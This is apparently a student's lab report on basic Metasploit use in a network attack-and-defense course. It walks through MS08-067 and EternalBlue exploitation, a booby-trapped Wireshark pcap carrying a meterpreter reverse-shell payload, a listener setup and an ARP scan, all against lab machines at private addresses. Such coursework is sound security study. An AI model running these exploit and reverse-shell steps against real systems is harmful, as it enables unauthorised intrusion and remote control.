2019-2020-2 20175212童皓桢《网络对抗技术》 Exp6 MSF基础应用

2019-2020-2 20175212童皓桢《网络对抗技术》

Exp6 MSF基础应用

目录

1. 实验目标

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。

2. 实验内容

2.1 主动攻击实践
ms08_067
  • 首先要扫描靶机是否存在漏洞:使用命令nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.1.110
    在这里插入图片描述

  • 我们可以查看到靶机的操作系统相关信息,以及具体的漏洞的一些描述信息

  • 我们使用命令msfconsole打开MSF控制台,使用命令search ms08-067 查看漏洞具体位置
    在这里插入图片描述

  • 我们根据查看到的信息,使用命令use exploit/windows/smb/ms08_067_netapi对靶机进行攻击

    • 我们可以使用以下命令查看更加详细的信息

      show payloads   //查看攻击载荷
      show options //查看端口信息等
      show targets //查看可攻击的平台
      

      在这里插入图片描述
      在这里插入图片描述
      在这里插入图片描述

  • 使用以下命令进行攻击

    set RHOST 192.168.1.110
    set LPORT 5212
    set LHOST 192.168.1.106
    set target 34  //根据上面查到的操作系统信息选择
    exploit
    
  • 我们可以使用ipconfig验证一下,已经成功获取了win shell。
    在这里插入图片描述

2.2 针对浏览器的攻击
ms17_010
  • 因为漏洞具体要求限制,这一步我们使用win7作为靶机来进行攻击

  • 使用命令use exploit/windows/smb/ms17_010_eternalblue进入模块,并使用show payloads显示可用荷载
    在这里插入图片描述

  • 使用以下命令进行ip端口等相关端口设置,并发起攻击

    set payload generic/shell_reverse_tcp//选择荷载  
    set RHOST 192.168.1.231 // 靶机IP
    set LPORT 5212 //回连主机端口号
    set LHOST 192.168.1.106 //设置攻击机IP
    exploit //攻击
    

    在这里插入图片描述

  • 打开靶机的浏览器,输入192.168.1.106:5212,即进行回连
    在这里插入图片描述

  • 如下图,我们获得了Win shell,用dir命令验证
    在这里插入图片描述

2.3 针对客户端的攻击
Wireshark
  • 进入目录/usr/share/metasploit-framework/modules/exploits/windows/fileformat,查看支持针对哪些文件类型的攻击,如下图所示:
    在这里插入图片描述

  • search wireshark,我们根据需求和版本选择以下模块,我这里选用exploit/windows/fileformat/wireshark_packet_dect
    在这里插入图片描述

  • 使用info命令查看具体信息,其中需要注意的是操作系统位数要求(Win32)以及Wireshark版本要求(≤1.4.4)
    在这里插入图片描述

  • 前两天刚好装了一个32位的XP,在装一个满足版本的Wireshark就行
    在这里插入图片描述

  • 使用以下命令,生成后门文件:

    set payload windows/meterpreter/reverse_tcp //设置tcp反向连接
    show options  
    set LHOST 192.168.1.106
    set LPORT 5212
    set FILENAME thz_exp6.pcap
    exploit 
    

    在这里插入图片描述

  • 后门文件自动生成在root的子文件夹下,我们用cp命令将其拷贝出来,再手动复制到靶机中(这一过程中需将本机的Win defender等相关软件关闭或允许操作)
    在这里插入图片描述

  • 使用以下命令开始监听:

    use exploit/multi/handler //进入监听模块
    set payload windows/meterpreter/reverse_tcp //设置tcp反向连接
    set LHOST 192.168.1.106
    set LPORT 5212
    exploit
    

    在这里插入图片描述

  • 靶机中双击打开该文件,可以看到kali成功获取了Win shell,并简单验证一下。
    在这里插入图片描述

2.4 成功应用任何一个辅助模块
  • 辅助模块主要作用是完成渗透前的一些准备工作,扫描主机端口之类的

  • 再msf控制台使用命令search scanner,查看所有扫描相关的辅助模块。可以看到功能非常多和细化
    在这里插入图片描述

  • 我这里就使用一下其提供的arp扫描功能,不知道有没有和其他同学撞车,就感觉比较容易使用。。。
    在这里插入图片描述

  • 使用命令show option,我设置了扫描的网段和线程数(加速)
    在这里插入图片描述

  • 开始扫描,可以看到192.168.1.110(刚开着的xp被扫出来了),可是不知道为什么本机没有被扫出。
    在这里插入图片描述

3、答老师问

3.1 实验收获与感想

这次实验主要围绕metasploit工具进行多种方式的攻击。虽然实验中简单的攻击都能成功,但前提是靶机的防火墙以及杀软都已经关的一干二净,实战中不是很现实;另外msf提供的大多数功能可以说是比较老旧的,很多对于版本限制都比较复古。。

3.2 用自己的话解释什么是exploit,payload,encode

答:

  • exploit意为渗透攻击。包括扫描、嗅探、渗透等全过程的针对计算机漏洞的攻击。
  • payload意为载荷。就是用来建立目标机与攻击机稳定连接的一些内容。
  • encode意为编码器。能偶提供编码功能隐藏特征码以防查杀。
3.3 离实战还缺些什么技术或步骤

主要还是攻击前都要手动把靶机的防火墙杀软之类的关闭。。。这种直接使用msf提供的功能在实际环境中应该很不容易成功的。

4、遇到的问题及其解决方法

  • 4.1 问题一: 在针对浏览器攻击时,攻击机开始监听的时候,靶机会蓝屏报错,大致意思为为“保护计算机不被破坏入侵”之类的。
    在这里插入图片描述
    在这里插入图片描述

    • 解决方法:没有很好的解决办法,因为防火墙win defender之类的我都关完了。换了一个win7,不再有这样的问题。

5、参考资料

https://www.cnblogs.com/entropy/p/6693174.html
https://gitee.com/zxy20175227/network_confrontation/releases/exp6

猜你喜欢

转载自www.cnblogs.com/thz666/p/12802165.html